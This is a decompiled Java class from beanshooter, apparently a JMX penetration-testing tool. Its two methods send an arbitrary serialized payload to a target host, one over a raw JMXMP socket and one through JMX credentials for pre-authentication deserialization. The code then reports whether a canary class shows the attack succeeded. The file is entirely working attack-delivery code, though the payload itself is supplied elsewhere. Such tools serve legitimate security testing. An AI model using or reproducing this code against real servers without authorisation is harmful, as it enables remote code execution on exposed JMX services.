/*
 * Decompiled with CFR 0.152.
 */
package de.qtc.beanshooter.operation;

import de.qtc.beanshooter.cli.ArgumentHandler;
import de.qtc.beanshooter.exceptions.AuthenticationException;
import de.qtc.beanshooter.exceptions.ExceptionHandler;
import de.qtc.beanshooter.exceptions.GlassFishException;
import de.qtc.beanshooter.exceptions.InvalidLoginClassException;
import de.qtc.beanshooter.io.Logger;
import de.qtc.beanshooter.operation.BeanshooterOption;
import de.qtc.beanshooter.plugin.PluginSystem;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.net.Socket;
import java.util.HashMap;
import org.jolokia.client.exception.J4pRemoteException;

public class SerialHelper {
    public static void serialJMXMP(Object payload) throws IOException {
        String host = (String)ArgumentHandler.require(BeanshooterOption.TARGET_HOST);
        int port = (Integer)ArgumentHandler.require(BeanshooterOption.TARGET_PORT);
        Logger.printlnYellow("Sending payload object.");
        try (Socket sock = new Socket(host, port);){
            ObjectOutputStream objOut = new ObjectOutputStream(sock.getOutputStream());
            objOut.writeObject(payload);
        }
        Logger.printlnMixedBlue("The payload object", "was send", "successfully.");
        Logger.printlnMixedBlueFirst("Notice:", "For JMXMP endpoints it is not possible to determine the success of a payload.");
    }

    public static void serialPreauth(Object payload) {
        String host = (String)ArgumentHandler.require(BeanshooterOption.TARGET_HOST);
        int port = (Integer)ArgumentHandler.require(BeanshooterOption.TARGET_PORT);
        HashMap<String, Object> env = new HashMap<String, Object>();
        env.put("jmx.remote.credentials", payload);
        try {
            PluginSystem.getMBeanServerConnectionUmanaged(host, port, env);
            Logger.printlnMixedYellow("Remote MBeanServer", "accepted", "the payload class.");
            if (BeanshooterOption.SERIAL_NO_CANARY.getBool()) {
                Logger.printlnMixedBlue("The attack was", "probably successful", "but could also have failed.");
                Logger.printlnMixedYellow("Rerun without the", "--no-canary", "option to get a more reliable result.");
            } else {
                Logger.printlnMixedBlue("The attack", "probably failed", "as the canary class was not deserialized.");
            }
        }
        catch (GlassFishException e) {
            Logger.printlnMixedYellow("Remote MBeanServer", "accepted", "the payload class.");
            if (BeanshooterOption.SERIAL_NO_CANARY.getBool()) {
                Logger.printlnMixedBlue("The attack was", "probably successful", "but could also have failed.");
                Logger.printlnMixedYellow("Rerun without the", "--no-canary", "option to get a more reliable result.");
            } else {
                Logger.printlnMixedBlue("The attack", "probably failed", "as the canary class was not deserialized.");
            }
        }
        catch (AuthenticationException e) {
            Throwable t = ExceptionHandler.getCause(e.getOriginalException());
            if (t instanceof ClassNotFoundException) {
                ExceptionHandler.deserialClassNotFound((ClassNotFoundException)t);
            } else if (e instanceof InvalidLoginClassException) {
                Logger.printlnMixedRed("Server appears to be", "not vulnerable", "to preauth deserialization attacks.");
                ExceptionHandler.showStackTrace(e);
            } else {
                ExceptionHandler.unexpectedException(e, "preauth deserialization", "attack", false);
            }
        }
        catch (J4pRemoteException e) {
            ExceptionHandler.handleJ4pRemoteException(e, "during deserialization attack");
        }
    }
}

